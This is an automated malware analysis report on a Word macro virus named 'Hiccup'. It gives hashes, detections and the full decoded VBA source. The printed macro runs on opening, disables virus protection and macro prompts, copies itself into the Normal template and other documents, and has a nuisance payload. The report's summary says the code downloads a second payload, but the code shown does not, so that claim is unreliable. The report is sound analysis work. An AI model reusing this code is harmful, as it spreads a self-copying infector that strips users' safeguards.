Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8d36740569da588…

MALICIOUS

Office (OLE)

45.0 KB Created: 2002-02-27 11:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3a1c83fcdb1a3ab3d7cba1aecfb10aaa SHA-1: 517b8d78ec4472b9541ab49e26956e24a7f68acb SHA-256: d8d36740569da5881566c6000f74d923185f29467ac22d4cfeeb821ca71e1cd5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that executes upon opening. The macro attempts to disable security features like macro warnings and virus protection, and modifies the document's appearance. It also contains logic to potentially call a 'hiccup_payload' function, suggesting it's designed to download and execute a secondary payload, a common tactic for malware.

Heuristics 3

  • ClamAV: Doc.Trojan.Onex-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Onex-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5571 bytes
SHA-256: 60af8fefdb9b7fc594a002e8e97ba2d8eed5e4b615dc6ef571d8923f0d3dfb6c
Detection
ClamAV: Doc.Trojan.Onex-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hiccup"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Open()
 On Error Resume Next
 Set Code = New DataObject
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
CommandBars("Tools").Controls("Macro").Enabled = 0
  If NormalTemplate.VBProject.VBComponents(1).Name = "hiccup" Then
    callitn = True
   Else
    Set A = NormalTemplate.VBProject.VBComponents(1)
  End If
  If ActiveDocument.VBProject.VBComponents(1).Name = "hiccup" Then
    callita = True
   Else
    Set A = ActiveDocument.VBProject.VBComponents(1)
    saveit = True
  End If
  Set ab = A.CodeModule
   Code.SetText hiccup.VBProject.VBComponents(1).CodeModule.Lines(1, hiccup.VBProject.VBComponents(1).CodeModule.CountOfLines)
   ab.DeleteLines 1, ab.CountOfLines
   ab.InsertLines 1, Code.GetText
   A.Name = "hiccup"
   If callitn = True And callita = True Then
    If Int(Rnd * 8) = 2 Then
      Call hiccup_payload
    End If
   
   End If
  If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Private Sub hiccup_payload()
On Error Resume Next
ActiveWindow.View.Type = wdPageView
ActiveDocument.Background.Fill.BackColor.RGB = RGB(255, 0, 0)

Do
DoEvents
Randomize
If Int(Rnd * 10000) = 2 Then
 Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMinimize
 Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMaximize
End If
Loop
End Sub
' Word 97/2k - Hiccup - PHSYCO XXX

' Processing file: /opt/analyzer/scan_staging/8c641389f8e64840ad4056b1b90bb559.bin
' ===============================================================================
' Module streams:
' Macros/VBA/hiccup - 7699 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	SetStmt 
' 	New id_945B
' 	Set Code 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #7:
' 	LitDI2 0x0000 
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "hiccup"
' 	Eq 
' 	IfBlock 
' Line #9:
' 	LitVarSpecial (True)
' 	St callitn 
' Line #10:
' 	ElseBlock 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set A 
' Line #12:
' 	EndIfBlock 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "hiccup"
' 	Eq 
' 	IfBlock 
' Line #14:
' 	LitVarSpecial (True)
' 	St callita 
' Line #15:
' 	ElseBlock 
' Line #16:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set A 
' Line #17:
' 	LitVarSpecial (True)
' 	St saveit 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	SetStmt 
' 	Ld A 
' 	MemLd CodeModule 
' 	Set ab 
' Line #20:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld hiccup 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld hiccup 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Code 
' 	ArgsMemCall SetText 0x0001 
' Line #21:
' 	LitDI2 0x0001 
' 	Ld ab 
' 	MemLd CountOfLines 
' 	Ld ab 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #22:
' 	LitDI2 0x0001 
' 	Ld Code 
' 	MemLd GetText 
' 	Ld ab 
' 	ArgsMemCall InsertLines 0x0002 
' Line #23:
' 	LitStr 0x0006 "hiccup"
' 	Ld A 
' 	MemSt New 
' Line #24:
' 	Ld callitn 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld callita 
' 	LitVarSpecial (True)
' 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.